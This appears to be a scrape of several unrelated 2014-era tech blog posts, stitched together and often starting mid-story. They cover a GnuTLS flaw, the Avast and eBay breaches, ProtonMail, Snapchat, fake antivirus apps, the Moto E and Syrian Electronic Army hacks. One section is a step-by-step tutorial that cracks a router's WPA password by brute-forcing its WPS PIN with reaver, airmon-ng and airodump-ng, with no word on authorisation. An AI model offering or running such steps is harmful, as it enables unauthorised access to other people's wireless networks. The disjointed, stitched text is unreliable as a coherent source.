GNUTLS is a free library implementing Secure Socket Layer(SSL), Transport Layer Security (TLS) and Datagram Transport Layer Security(DTLS) protocols which are used to offer secure communications.

“A flaw was found in the way GnuTLS parsed session ids from Server Hello packets of the TLS/SSL handshake.” an entry posted on the Red Hat Bug Tracker reads.

Flaw: The read_server_hello function checks only whether the length of the Session ID does not exceed incoming packet size but it fails to ensure it doesn’t exceed maximum length of Session ID.

A malicious server could exploit this vulnerability by sending a very long Session ID value and run a malicious code in “a connecting TLS/SSL client using GnuTLS”.

In March, a different vulnerability was patched in GnuTLS Library that could have allowed attackers “to create a specially crafted certificate that could be accepted by GnuTLS as valid for a site chosen by the attacker”

User names, email addresses,nick names and passwords were compromised in this attack.  The breach did not involve any financial data, license or any other data.

While the passwords are hashed(one way encryption), it will not take much time for a hacker to crack the hashes. The longer the password, the harder it is to crack.

According to Avast blog post, the security breach affects less than 0.2% (about 400,000) of Avast’s 200 million users.

People who uses the same password on other websites are advised to change those passwords immediately.

Until now, their forum used an open source community software called “Simple Machines Forum(SMF)”.  It appears the Avast is using an outdated version of SMF.

Avast said it is now “We are now rebuilding the forum and moving it to a different software platform” which will be secure one.SMF

“Changing passwords is a best practice and will help enhance security for eBay users,” said the blog.

The hackers compromised a small number of employee log-in credentials and gained unauthorized access to eBay’s corporate network.

Apparently, the database ‘that contained encrypted passwords and other non-financial data’ was compromised between late February and early March, however, eBay discovered it only two weeks ago.

The data breached included sensitive personal information about customers’ name, encrypted password, email address, physical address, phone number and date of birth.

But, the financial information and other confidential personal information about users were safe, the blog added.

After extensive forensics, the company identified the compromised database and added that:

 “there was no evidence of the compromise resulting in unauthorized activity for eBay users, and no evidence of any unauthorized access to financial or credit card information.”

eBay tried to assuage fears of PayPal [its online payment system] users that there was no evidence of compromise to their personal or financial information. Moreover, their data are stored on a separate network.

The organization apologized for the inconvenience to its users and reassured their commitment towards information security and customer data protection.

“We know our customers trust us with their information, and we take seriously our commitment to maintaining a safe, secure and trusted global marketplace.”

eBay is planning to send out emails, use site communications as well inform its users through appropriate marketing channels to change their passwords and also change passwords for other sites where the same password was used.

eBay, which generated USD 205 billion of commerce in 2013, had its shares nosedive initially following the breach news; the shares rebounded by afternoon.

This is not the first cyberattack against eBay. Recently, in February 2014, The Syrian Electronic Army (SEA), a notorious hacking group, had hacked eBay and PayPal “For denying Syrian citizens the ability to purchase online products.”

In the attack, the SEA had modified the DNS records of ebay.co.uk and paypal.co.uk as well as hacked into their Domain Registry managed by Mark Monitor.

The eBay attack could be the largest online breach following last year’s Target data breach, which had impacted about 110 million customers.

ProtonMail, the new email platform launched at European Organization for Nuclear Research (CERN) by five security experts ‘who were drawn together by a shared vision of a more secure and private Internet,’ is probably safer and secure than Lavabit, Snowden’s defunct email service.

The service has many benefits over conventional email service providers. As the founders explain:

They are incorporated in Switzerland, which is well known for offering the strongest privacy protection to both individuals as well as countries.

The site uses end-to-end encryption and intense user authentication measures, implying that the data transmitted through their services is inaccessible to the ProtonMail team itself, let alone other people.

“ProtonMail’s segregated authentication and decryption system means logging into a ProtonMail account that requires two passwords. The first password is used to authenticate the user and retrieve the correct account. The second password is a decryption password which is never sent to us. It is used to decrypt the user’s data in the browser so we never have access to the decrypted data, or the decryption password,” reads the website.

It is free forever and does not allow tracking or logging of personally identifiable information.

“We do not save any metadata such as the IPs used to connect to accounts, or  the times certain accounts are accessed,” the website says.

Even data with non-ProtonMail users is secure and emails are provided with an optional expiration time so that there are no trails of sent messages.

They use only trusted secure implementations AES, RSA, along with OpenPGP with open source cryptographic libraries.

Besides, the service providers have invested heavily in hardware security, with fully encrypted hard disks and multiple password layers, thus preserving data security even in an event of hardware seize.

Additionally, they conduct routine server side integrity checks and uses Swiss SSL secured connections.

With a few weeks in private beta, ProtonMail launched its beta phase recently and is an easy to use ‘comprehensive security for everyone,’ according to the website claims.

Worth giving a try!!!!

Snapchat is the app to be this year. Everyone is trying ways to one-up the messaging app (including Yahoo) that started the self-destructing communication craze. It got a hold on teens, who have shunned Facebook to pick up their smartphones for a more private sharing experience.

Facebook knew Snapchat had an edge and wanted to pick up the startup last year for a reported $3 billion. But that number didn’t sway Snapchat and it continued adding features to the app that made people want it more. Last month, it updated the app (with wild success) to include video chatting and text-based messaging as well, thereby fully deploying its messaging arsenal without losing its core feature – all communication from Snapchat still gets deleted after a short period.

Facebook is now working on its own private sharing app called SlingShot, which would primarily be a video-based service. But can it dethrone Snapchat, which already has a big user base, longer market exposure and has more features?

The one area where Facebook can truly capitalise is by going after Snapchat’s weaknesses. One of them is that the app has just had to pay a large settlement in a lawsuit which alleged messages don’t get destroyed permanently or immediately. Snapchat agreed to the charges to settle with the FTC, so there’s definitely a little bit of stink attached to the app at the moment. Over time, this will evaporate away, so Facebook has a moment’s window to make their play, by releasing a completely secure, self-destructing chat service.

Facebook’s supposed SlingShot app will definitely upset Snapchat’s growth trajectory, but to what extent is currently unknown. Facebook could do most damage is by bundling it into Messenger, rather than releasing it as a standalone app. Messenger remains relevant even as teens leave Facebook, as it’s a way to chat with your FB friends. An added privacy feature would go a long way towards ensuring more engaged users. That seems unlikely given Mark Zuckerberg’s commitment to standalone apps.

Private messaging is a big chunk of all smartphone usage. One thing is certain: Facebook will have a huge user base to tap into with SlingShot and the numbers dwarf Snapchat’s active user base. So if SlingShot is any good at all, Facebook has a big pool to tap into. After the high of last year, it may be worrying days for Snapchat.

While Google Play Store is able to prevent malicious applications from being uploaded to the market, Google still fails to prevent cyber criminals from uploading fake apps.

Last Month, Android Police discovered a fake Antivirus app on Google Play going by the name of ‘Virus Shield’ which fooled thousands of users into buying this app.

The story of fake Antivirus apps doesn’t stop there. Today, Experts at Kaspersky have discovered one more fake Antivirus app going by the name of ‘Kaspersky Anti-virus 2014’ on Google Play.

The fake version of Kaspersky was being sold for $4 that does nothing other than displaying the Kaspersky Logo.

Researchers also discovered that few fake apps were being sold at Windows Phone Store. Some of them are ‘Mozilla Mobile’, ‘Kaspersky Mobile’, ‘Avira Antivirus’ and the ‘Virus Shield’ apps.

The fake version of Kaspersky antivirus app for Windows phone pretends to be scanning your device but does nothing.

Few weeks back, when i was searching for TrueCaller app for my Windows phone, i also came across a fake paid Version of TrueCaller and other apps. After i reported to Microsoft, they removed those apps from the store.

Just now, I also found a fake version of COMODO Antivirus for the windows phone which is being sold for $1.49. This fake app was uploaded by cheedella suresh( The name appears to be South Indian name).

As you can see, the developer has also uploaded few other fake apps in Windows phone store.  These apps have been uploaded in the recent months(April- May).

 
If your Facebook wall offers you any horror videos that claim to be of a real ghost spotted, don’t dare to click on them, as it may be hoaxes, malwares or scams contained within which are the real horror for the online users.

• Alleged footage of an “actual” ghost attack
• a video featuring the Aswang that is described as “a mythical shape-shifting were-dog/vampire/terrifying thing from the Philippines”
• a video of Mermaids claiming they are back!
• Video of a huge great white shark tearing apart a sea captain.

 

Mobile analysts everywhere have been spelling it out since the beginning of 2013: The age of high-end flagship smartphones is over and mid-range phones will drive the volume of sales. According to an IDC report in February 2014, “emerging markets have become the centre of attention when talking about present and future smartphone growth.”

The report notes that in a developing market like India, what will drive up smartphone sales are low-cost or budget phones. “Growth in the India market doesn’t rely on high-end devices like the iPhone, but in low-cost Android phones,” said Kiranjeet Kaur, a senior analyst for mobile phones at IDC Asia/Pacific.

And this is why the Moto E could be a big hit. In terms of specs, the device has a 4.3-inch screen with 960×540 pixel resolution with Gorilla Glass 3. It is the only smartphone offering such a high quality display at this price point. Compared to this the display of the Samsung Galaxy Star Pro, which is priced at Rs 6,110 has a resolution of 800×480 (WVGA) pixels.

The Moto E also comes with Android 4.4 KitKat in its stock form, with Motorola software in the form of apps. It has a dual-core processor clocked at 1.2 GHz and 1GB RAM, along with 4GB internal storage space and a microSD card slot. On the back is a 5 megapixel camera but there’s no front camera or LED flash, which is standard for this price point. It also has 3G support, Bluetooth 4.0, for low-powered connections.

In comparison to this the Star Pro doesn’t have 3G, has a single-core processor and is still on Android Jelly Bean. The camera is a mere 2-megapixel unit. The RAM and total memory for the smartphone are not listed on Samsung’s website, but at least the former is unlikely to top the Moto E. For a user who wants specs but has a low-end budget the Moto E with its 1GB RAM, and 5-megapixel camera is the clear winner. And what helps is that Motorola, like Samsung, has good after-sales service.

For Samsung, as this IDC report notes, the Galaxy Star has been ”bringing in huge volumes at the low end,” and the Pro is supposed to be a better version of this.With the Moto E coming at such low-cost and offering great specs, that picture could change quickly.

Where Sony is concerned, the cheapest smartphone they have to offer is Sony Xperia E which is available in dual-SIM and single SIM versions. The smartphone, which is priced at around Rs 7,990 at online retailers, has 3.5 inch screen with 320×480 pixel resolution, 512 MB RAM, and a 3.15 primary VGA camera and no front camera. The single-SIM version of the phone is priced at Rs 6,895. This, too, pales in comparison to the Moto E.

The Moto E is a winner over both low-end Sony and Samsung smartphones. The other brand that should worry about the Moto E is Nokia, which had the third spot in smartphone sales in India, according to latest IDC data.

Nokia’s Android offering the Nokia X which was launched for Rs 8,599, but retails close to the Moto E’s price, again lags behind in terms of specs. While the 4-inch display and the 1GHz dual-core processor are close to the Moto E, the 512 MB RAM, and 3-megapixel rear camera come up short. This is even more unlikely to impress users given that the Android version on Nokia X is a forked-one with no access to the Google Play Store. Nokia has promised that users will be able to run most Android apps but the fact that there’s no official Google support could be a deal-breaker for many.

Something that’s rarely seen in the sub-Rs 8,000 bracket is the large battery of the Moto E. The 1980 mAh battery sounds aplenty given its non-demanding hardware. So on nearly all counts, the Moto E has the better of its rivals.

While specs and price are a big plus for Moto E, the one advantage that the competitors have is that the smartphone is only available on Flipkart. It’s not a phone that you are likely to see in your local mobile store shop, someplace where you can get a chance to handle the phone, which goes a long way in spreading brand awareness as well.

The problem is that the Moto E is restricted to users who are used to or know abfout online shopping. This significantly reduces the target audience for the phone.

Of course, the impact Moto E makes on the market will only be revealed once the first sales figures are out. For now, it’s safe to say that Moto E has a lot to offer in terms of brand and specs for those who don’t want to spend a bomb on their next (or possibly first) smartphone.

step 1: Boot into backtrack
step 2:install reaver

these are code to install reaver

open terminal and type :

apt-get update

apt-get install reaver

step 3:Find your wireless card open terminal and type

iwconfig

hit enter

step 4: type airmon-ng start wlan0

step 5: type airodump-ng mon0

step 6: Crack the wpa password and open terminal and type and hit enter.

reaver -i moninterface -b bssid -vv

this code in my case will look like mine.

reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv

hit enter.

Press Enter, sit back, and let Reaver work its disturbing magic. Reaver will now try a series of PINs on the router in a brute force attack, one after another. This will take a while. In my successful test, Reaver took 2 hours and 30 minutes to crack the network and deliver me with the correct password. As mentioned above, the Reaver documentation says it can take between 4 and 10 hours, so it could take more or less time than I experienced, depending.

How reaver works?

Now that you’ve seen how to use Reaver, let’s take a quick overview of how Reaver works. The tool takes advantage of a vulnerability in something called Wi-Fi Protected Setup, or WPS. It’s a feature that exists on many routers, intended to provide an easy setup process, and it’s tied to a PIN that’s hard-coded into the device. Reaver exploits a flaw in these PINs; the result is that, with enough time, it can reveal your WPA or WPA2 password.

“Don’t use Microsoft emails(hotmail,outlook),They are monitoring your accounts and selling the data to the governments. #SEA @Official_SEA16,” the message read.

This is the second time that Microsoft’s accounts were hacked by the Syrian Electronic Army. It had hacked Microsoft’s Xbox Twitter account, Skype’s Twitter and Facebook accounts on New Year Eve’s. Microsoft, which owns Skype, had to issue a warning to discourage people from using Microsoft emails following the New Year’s Day hack.

After attacking Microsoft’s Twitter News account, The “Official Microsoft Blog,” blog was also hacked and displayed SEA messages, and redirected to the hacking group’s website for at least some users.

In response to the cyber attacks a Microsoft spokesperson stated, “Microsoft is aware of targeted cyber attacks that temporarily affected the Xbox Support and Microsoft News Twitter accounts. The accounts were quickly reset and we can confirm that no customer information was compromised.”

Recently popular messaging Snapchat was hacked and more than 4.6 Million users id’s were leaked online. Snapchat has now released an updated version to prevent future attacks. The app now allows users to opt out of ‘Find Friends’ feature that stores the usernames and phone numbers. The company has even set up an email address so white-hat hackers can use to notify the company of potential exploits: security@snapchat.com.